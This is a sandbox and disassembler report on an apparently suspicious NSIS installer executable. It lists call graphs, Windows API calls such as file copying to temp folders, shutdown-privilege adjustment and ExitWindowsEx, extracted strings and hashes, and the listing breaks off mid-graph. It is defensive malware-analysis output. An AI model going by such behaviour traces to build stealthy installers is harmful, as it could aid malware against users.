SendMessageW 5253 402a41 InvalidateRect 5252->5253 5254 402a4c 5252->5254 5253->5254 4554 405128 4555 405138 4554->4555 4556 40514c 4554->4556 4557 405195 4555->4557 4558 40513e 4555->4558 4559 405154 IsWindowVisible 4556->4559 4566 405174 4556->4566 4560 40519a CallWindowProcW 4557->4560 4561 404165 SendMessageW 4558->4561 4559->4557 4562 405161 4559->4562 4563 405148 4560->4563 4561->4563 4568 404a7e SendMessageW 4562->4568 4566->4560 4573 404afe 4566->4573 4569 404aa1 GetMessagePos ScreenToClient SendMessageW 4568->4569 4570 404add SendMessageW 4568->4570 4571 404ada 4569->4571 4572 404ad5 4569->4572 4570->4572 4571->4570 4572->4566 4582 406055 lstrcpynW 4573->4582 4575 404b11 4583 405f9c wsprintfW 4575->4583 4577 404b1b 4578 40140b 2 API calls 4577->4578 4579 404b24 4578->4579 4584 406055 lstrcpynW 4579->4584 4581 404b2b 4581->4557 4582->4575 4583->4577 4584->4581 4585 40242a 4596 402cc9 4585->4596 4587 402434 4588 402bbf 18 API calls 4587->4588 4589 40243d 4588->4589 4590 402448 RegQueryValueExW 4589->4590 4595 40281e 4589->4595 4591 40246e RegCloseKey 4590->4591 4592 402468 4590->4592 4591->4595 4592->4591 4600 405f9c wsprintfW 4592->4600 4597 402bbf 18 API calls 4596->4597 4598 402ce2 4597->4598 4599 402cf0 RegOpenKeyExW 4598->4599 4599->4587 4600->4591 5255 40422d lstrcpynW lstrlenW 5256 40172d 5257 402bbf 18 API calls 5256->5257 5258 401734 SearchPathW 5257->5258 5259 40174f 5258->5259 4601 404b30 GetDlgItem GetDlgItem 4602 404b82 7 API calls 4601->4602 4610 404d9b 4601->4610 4603 404c25 DeleteObject 4602->4603 4604 404c18 SendMessageW 4602->4604 4605 404c2e 4603->4605 4604->4603 4606 404c3d 4605->4606 4607 404c65 4605->4607 4608 406077 18 API calls 4606->4608 4611 404119 19 API calls 4607->4611 4614 404c47 SendMessageW SendMessageW 4608->4614 4609 404e60 4613 404e7f 4609->4613 4621 404e71 SendMessageW 4609->4621 4610->4609 4610->4613 4617 404dfb 4610->4617 4618 404c79 4611->4618 4612 404f2b 4615 404f35 SendMessageW 4612->4615 4616 404f3d 4612->4616 4613->4612 4619 405113 4613->4619 4624 404ed8 SendMessageW 4613->4624 4614->4605 4615->4616 4626 404f56 4616->4626 4627 404f4f ImageList_Destroy 4616->4627 4639 404f66 4616->4639 4622 404a7e 5 API calls 4617->4622 4623 404119 19 API calls 4618->4623 4620 404180 8 API calls 4619->4620 4625 405121 4620->4625 4621->4613 4637 404e0c 4622->4637 4638 404c87 4623->4638 4624->4619 4629 404eed SendMessageW 4624->4629 4630 404f5f GlobalFree 4626->4630 4626->4639 4627->4626 4628 4050d5 4628->4619 4633 4050e7 ShowWindow GetDlgItem ShowWindow 4628->4633 4632 404f00 4629->4632 4630->4639 4631 404d5c GetWindowLongW SetWindowLongW 4634 404d75 4631->4634 4640 404f11 SendMessageW 4632->4640 4633->4619 4635 404d93 4634->4635 4636 404d7b ShowWindow 4634->4636 4658 40414e SendMessageW 4635->4658 4657 40414e SendMessageW 4636->4657 4637->4609 4638->4631 4641 404d56 4638->4641 4644 404cd7 SendMessageW 4638->4644 4645 404d13 SendMessageW 4638->4645 4646 404d24 SendMessageW 4638->4646 4639->4628 4647 404afe 4 API calls 4639->4647 4651 404fa1 4639->4651 4640->4612 4641->4631 4641->4634 4644->4638 4645->4638 4646->4638 4647->4651 4648 404d8e 4648->4619 4649 4050ab InvalidateRect 4649->4628 4650 4050c1 4649->4650 4659 404a39 4650->4659 4652 404fcf SendMessageW 4651->4652 4653 404fe5 4651->4653 4652->4653 4653->4649 4654 405046 4653->4654 4656 405059 SendMessageW SendMessageW 4653->4656 4654->4656 4656->4653 4657->4648 4658->4610 4662 404970 4659->4662 4661 404a4e 4661->4628 4663 404989 4662->4663 4664 406077 18 API calls 4663->4664 4665 4049ed 4664->4665 4666 406077 18 API calls 4665->4666 4667 4049f8 4666->4667 4668 406077 18 API calls 4667->4668 4669 404a0e lstrlenW wsprintfW SetDlgItemTextW 4668->4669 4669->4661 5260 4045b4 5261 4045e0 5260->5261 5262 4045f1 5260->5262 5321 40577e GetDlgItemTextW 5261->5321 5263 4045fd GetDlgItem 5262->5263 5270 40465c 5262->5270 5265 404611 5263->5265 5269 404625 SetWindowTextW 5265->5269 5273 405ab4 4 API calls 5265->5273 5266 404740 5319 4048ef 5266->5319 5323 40577e GetDlgItemTextW 5266->5323 5267 4045eb 5268 4062e9 5 API calls 5267->5268 5268->5262 5274 404119 19 API calls 5269->5274 5270->5266 5275 406077 18 API calls 5270->5275 5270->5319 5272 404180 8 API calls 5277 404903 5272->5277 5278 40461b 5273->5278 5279 404641 5274->5279 5280 4046d0 SHBrowseForFolderW 5275->5280 5276 404770 5281 405b11 18 API calls 5276->5281 5278->5269 5285 405a09 3 API calls 5278->5285 5282 404119 19 API calls 5279->5282 5280->5266 5283 4046e8 CoTaskMemFree 5280->5283 5284 404776 5281->5284 5286 40464f 5282->5286 5287 405a09 3 API calls 5283->5287 5324 406055 lstrcpynW 5284->5324 5285->5269 5322 40414e SendMessageW 5286->5322 5289 4046f5 5287->5289 5292 40472c SetDlgItemTextW 5289->5292 5296 406077 18 API calls 5289->5296 5291 404655 5295 40642b 5 API calls 5291->5295 5292->5266 5293 40478d 5294 40642b 5 API calls 5293->5294 5297 404794 5294->5297 5295->5270 5298 404714 lstrcmpiW 5296->5298 5299 4047d5 5297->5299 5307 405a55 2 API calls 5297->5307 5308 40482d 5297->5308 5298->5292 5300 404725 lstrcatW 5298->5300 5325 406055 lstrcpynW 5299->5325 5300->5292 5302 4047dc 5303 405ab4 4 API calls 5302->5303 5304 4047e2 GetDiskFreeSpaceW 5303->5304 5306 404806 MulDiv 5304->5306 5304->5308 5306->5308 5307->5297 5309 40489e 5308->5309 5311 404a39 21 API calls 5308->5311 5310 4048c1 5309->5310 5312 40140b 2 API calls 5309->5312 5326 40413b EnableWindow 5310->5326 5313 40488b 5311->5313 5312->5310 5314 4048a0 SetDlgItemTextW 5313->5314 5315 404890 5313->5315 5314->5309 5317 404970 21 API calls 5315->5317 5317->5309 5318 4048dd 5318->5319 5327 404549 5318->5327 5319->5272 5321->5267 5322->5291 5323->5276 5324->5293 5325->5302 5326->5318 5328 404557 5327->5328 5329 40455c SendMessageW 5327->5329 5328->5329 5329->5319 5330 4027b4 5331 4027ba 5330->5331 5332 4027c2 FindClose 5331->5332 5333 402a4c 5331->5333 5332->5333 5334 4042b6 5335 4042ce 5334->5335 5339 4043e8 5334->5339 5340 404119 19 API calls 5335->5340 5336 404452 5337 404524 5336->5337 5338 40445c GetDlgItem 5336->5338 5345 404180 8 API calls 5337->5345 5341 4044e5 5338->5341 5342 404476 5338->5342 5339->5336 5339->5337 5343 404423 GetDlgItem SendMessageW 5339->5343 5344 404335 5340->5344 5341->5337 5347 4044f7 5341->5347 5342->5341 5346 40449c 6 API calls 5342->5346 5365 40413b EnableWindow 5343->5365 5349 404119 19 API calls 5344->5349 5355 40451f 5345->5355 5346->5341 5350 40450d 5347->5350 5351 4044fd SendMessageW 5347->5351 5353 404342 CheckDlgButton 5349->5353 5354 404513 SendMessageW 5350->5354 5350->5355 5351->5350 5352 40444d 5356 404549 SendMessageW 5352->5356 5363 40413b EnableWindow 5353->5363 5354->5355 5356->5336 5358 404360 GetDlgItem 5364 40414e SendMessageW 5358->5364 5360 404376 SendMessageW 5361 404393 GetSysColor 5360->5361 5362 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5360->5362 5361->5362 5362->5355 5363->5358 5364->5360 5365->5352 5366 401b37 5367 401b88 5366->5367 5372 401b44 5366->5372 5368 401bb2 GlobalAlloc 5367->5368 5369 401b8d 5367->5369 5370 406077 18 API calls 5368->5370 5381 402288 5369->5381 5387 406055 lstrcpynW 5369->5387 5374 401bcd 5370->5374 5371 406077 18 API calls 5375 402282 5371->5375 5372->5374 5376 401b5b 5372->5376 5374->5371 5374->5381 5379 40579a MessageBoxIndirectW 5375->5379 5385 406055 lstrcpynW 5376->5385 5377 401b9f GlobalFree 5377->5381 5379->5381 5380 401b6a 5386 406055 lstrcpynW 5380->5386 5383 401b79 5388 406055 lstrcpynW 5383->5388 5385->5380 5386->5383 5387->5377 5388->5381 5389 402537 5390 402562 5389->5390 5391 40254b 5389->5391 5392 402596 5390->5392 5393 402567 5390->5393 5394 402ba2 18 API calls 5391->5394 5396 402bbf 18 API calls 5392->5396 5395 402bbf 18 API calls 5393->5395 5402 402552 5394->5402 5397 40256e WideCharToMultiByte lstrlenA 5395->5397 5398 40259d lstrlenW 5396->5398 5397->5402 5398->5402 5399 4025e0 5400 4025ca 5400->5399 5401 405cdc WriteFile 5400->5401 5401->5399 5402->5399 5402->5400 5403 405d0b 5 API calls 5402->5403 5403->5400 5404 4014b8 5405 4014be 5404->5405 5406 401389 2 API calls 5405->5406 5407 4014c6 5406->5407 4698 4015b9 4699 402bbf 18 API calls 4698->4699 4700 4015c0 4699->4700 4701 405ab4 4 API calls 4700->4701 4713 4015c9 4701->4713 4702 401629 4703 40165b 4702->4703 4704 40162e 4702->4704 4708 401423 25 API calls 4703->4708 4706 401423 25 API calls 4704->4706 4705 405a36 CharNextW 4705->4713 4707 401635 4706->4707 4717 406055 lstrcpynW 4707->4717 4714 401653 4708->4714 4710 405700 2 API calls 4710->4713 4711 40571d 5 API calls 4711->4713 4712 401642 SetCurrentDirectoryW 4712->4714 4713->4702 4713->4705 4713->4710 4713->4711 4715 40160f GetFileAttributesW 4713->4715 4716 405683 4 API calls 4713->4716 4715->4713 4716->4713 4717->4712 5408 10002a7f 5409 10002a97 5408->5409 5410 1000158f 2 API calls 5409->5410 5411 10002ab2 5410->5411

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 8 4032de 1->8 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 8->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 26 4033b1-4033b7 24->26 27 4033aa-4033af 24->27 34 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->34 35 403526-403540 DeleteFileW call 402dee 25->35 29 4033b9-4033bd 26->29 30 4033be-4033c2 26->30 27->26 27->27 29->30 32 403480-40348d call 405a36 30->32 33 4033c8-4033ce 30->33 50 403491-403497 32->50 51 40348f-403490 32->51 38 4033d0-4033d7 33->38 39 4033e8-403421 33->39 34->35 49 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 34->49 52 4035f1-403602 call 4037c4 OleUninitialize 35->52 53 403546-40354c 35->53 43 4033d9-4033dc 38->43 44 4033de 38->44 45 403423-403428 39->45 46 40343e-403478 39->46 43->39 43->44 44->39 45->46 54 40342a-403432 45->54 46->32 48 40347a-40347e 46->48 48->32 55 40349f-4034ad call 406055 48->55 49->35 49->52 50->24 57 40349d 50->57 51->50 71 403728-40372e 52->71 72 403608-403618 call 40579a ExitProcess 52->72 58 4035e1-4035e8 call 40389e 53->58 59 403552-40355d call 405a36 53->59 61 403434-403437 54->61 62 403439 54->62 64 4034b2 55->64 57->64 70 4035ed 58->70 75 4035ab-4035b5 59->75 76 40355f-403594 59->76 61->46 61->62 62->46 64->25 70->52 73 403730-403746 GetCurrentProcess OpenProcessToken 71->73 74 4037ac-4037b4 71->74 81 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 73->81 82 40377c-40378a call 40642b 73->82 84 4037b6 74->84 85 4037ba-4037be ExitProcess 74->85 78 4035b7-4035c5 call 405b11 75->78 79 40361e-403632 call 40571d lstrcatW 75->79 83 403596-40359a 76->83 78->52 95 4035c7-4035dd call 406055 * 2 78->95 96 403634-40363a lstrcatW 79->96 97 40363f-403659 lstrcatW lstrcmpiW 79->97 81->82 98 403798-4037a3 ExitWindowsEx 82->98 99 40378c-403796 82->99 89 4035a3-4035a7 83->89 90 40359c-4035a1 83->90 84->85 89->83 94 4035a9 89->94 90->89 90->94 94->75 95->58 96->97 97->52 101 40365b-40365e 97->101 98->74 102 4037a5-4037a7 call 40140b 98->102 99->98 99->102 104 403660-403665 call 405683 101->104 105 403667 call 405700 101->105 102->74 113 40366c-40367a SetCurrentDirectoryW 104->113 105->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 125 40371c-403723 call 405ef6 122->125 123->122 124 4036e5-403705 call 405ef6 call 406077 call 405735 123->124 124->122 134 403707-40370e CloseHandle 124->134 125->52 134->122
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                                • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\ppISxhDcpF.exe",00000000), ref: 00403363
                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\ppISxhDcpF.exe",?), ref: 0040338A
                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ppISxhDcpF.exe",00000000,?), ref: 0040362B
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ppISxhDcpF.exe",00000000,?), ref: 0040363A
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ppISxhDcpF.exe",00000000,?), ref: 00403645
                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ppISxhDcpF.exe",00000000,?), ref: 00403651
                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\ppISxhDcpF.exe,0042AA28,00000001), ref: 004036DB
                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 00403737
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                • String ID: "C:\Users\user\Desktop\ppISxhDcpF.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\nonactor$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ppISxhDcpF.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                • API String ID: 3586999533-634594066
                                                                                                                • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 148 404eb3-404eba 144->148 151 404de4-404deb 145->151 152 404dd7-404dde 145->152 149 404c40-404c5d call 406077 SendMessageW * 2 146->149 150 404c3d 146->150 147->143 153 404c65-404c91 call 404119 * 2 147->153 158 404f2b-404f33 148->158 159 404ebc-404ec2 148->159 149->147 150->149 155 404e60-404e63 151->155 156 404ded-404df0 151->156 152->148 152->151 191 404c97-404c9d 153->191 192 404d5c-404d6f GetWindowLongW SetWindowLongW 153->192 155->148 160 404e65-404e6f 155->160 164 404df2-404df9 156->164 165 404dfb-404e10 call 404a7e 156->165 162 404f35-404f3b SendMessageW 158->162 163 404f3d-404f44 158->163 167 405113-405125 call 404180 159->167 168 404ec8-404ed2 159->168 170 404e71-404e7d SendMessageW 160->170 171 404e7f-404e89 160->171 162->163 172 404f46-404f4d 163->172 173 404f78-404f7f 163->173 164->155 164->165 165->155 190 404e12-404e23 165->190 168->167 176 404ed8-404ee7 SendMessageW 168->176 170->171 171->148 178 404e8b-404e95 171->178 179 404f56-404f5d 172->179 180 404f4f-404f50 ImageList_Destroy 172->180 183 4050d5-4050dc 173->183 184 404f85-404f91 call 4011ef 173->184 176->167 185 404eed-404efe SendMessageW 176->185 186 404ea6-404eb0 178->186 187 404e97-404ea4 178->187 188 404f66-404f72 179->188 189 404f5f-404f60 GlobalFree 179->189 180->179 183->167 196 4050de-4050e5 183->196 210 404fa1-404fa4 184->210 211 404f93-404f96 184->211 194 404f00-404f06 185->194 195 404f08-404f0a 185->195 186->148 187->148 188->173 189->188 190->155 199 404e25-404e27 190->199 200 404ca0-404ca7 191->200 198 404d75-404d79 192->198 194->195 202 404f0b-404f24 call 401299 SendMessageW 194->202 195->202 196->167 197 4050e7-405111 ShowWindow GetDlgItem ShowWindow 196->197 197->167 204 404d93-404d9b call 40414e 198->204 205 404d7b-404d8e ShowWindow call 40414e 198->205 206 404e29-404e30 199->206 207 404e3a 199->207 208 404d3d-404d50 200->208 209 404cad-404cd5 200->209 202->158 204->137 205->167 218 404e32-404e34 206->218 219 404e36-404e38 206->219 222 404e3d-404e59 call 40117d 207->222 208->200 213 404d56-404d5a 208->213 220 404cd7-404d0d SendMessageW 209->220 221 404d0f-404d11 209->221 214 404fe5-405009 call 4011ef 210->214 215 404fa6-404fbf call 4012e2 call 401299 210->215 223 404f98 211->223 224 404f99-404f9c call 404afe 211->224 213->192 213->198 237 4050ab-4050bf InvalidateRect 214->237 238 40500f 214->238 245 404fc1-404fc7 215->245 246 404fcf-404fde SendMessageW 215->246 218->222 219->222 220->208 225 404d13-404d22 SendMessageW 221->225 226 404d24-404d3a SendMessageW 221->226 222->155 223->224 224->210 225->208 226->208 237->183 241 4050c1-4050d0 call 404a51 call 404a39 237->241 239 405012-40501d 238->239 242 405093-4050a5 239->242 243 40501f-40502e 239->243 241->183 242->237 242->239 247 405030-40503d 243->247 248 405041-405044 243->248 249 404fc9 245->249 250 404fca-404fcd 245->250 246->214 247->248 252 405046-405049 248->252 253 40504b-405054 248->253 249->250 250->245 250->246 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->242 256->255
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00404B9D
                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                • SetWindowLongW.USER32(?,?,00405128), ref: 00404BC9
                                                                                                                • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C23
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                • GetWindowLongW.USER32(?,?), ref: 00404D61
                                                                                                                • SetWindowLongW.USER32(?,?,00000000), ref: 00404D6F
                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404EF7
                                                                                                                • SendMessageW.USER32(?,00000420,00000000,?), ref: 00404F1B
                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                • String ID: $M$N
                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 263 403c70-403c7d SetWindowPos 260->263 264 403c83-403c86 260->264 266 403e47-403e4c call 404165 261->266 267 403e09-403e0c 261->267 262->261 263->264 269 403ca0-403ca6 264->269 270 403c88-403c9a ShowWindow 264->270 275 403e51-403e6c 266->275 272 403e0e-403e19 call 401389 267->272 273 403e3f-403e41 267->273 276 403cc2-403cc5 269->276 277 403ca8-403cbd DestroyWindow 269->277 270->269 272->273 288 403e1b-403e3a SendMessageW 272->288 273->266 274 4040e6 273->274 282 4040e8-4040ef 274->282 280 403e75-403e7b 275->280 281 403e6e-403e70 call 40140b 275->281 285 403cc7-403cd3 SetWindowLongW 276->285 286 403cd8-403cde 276->286 283 4040c3-4040c9 277->283 291 403e81-403e8c 280->291 292 4040a4-4040bd DestroyWindow EndDialog 280->292 281->280 283->274 289 4040cb-4040d1 283->289 285->282 293 403d81-403d8f call 404180 286->293 294 403ce4-403cf5 GetDlgItem 286->294 288->282 289->274 296 4040d3-4040dc ShowWindow 289->296 291->292 297 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 291->297 292->283 293->282 298 403d14-403d17 294->298 299 403cf7-403d0e SendMessageW IsWindowEnabled 294->299 296->274 327 403ee1-403ee6 297->327 328 403ee9-403f25 ShowWindow 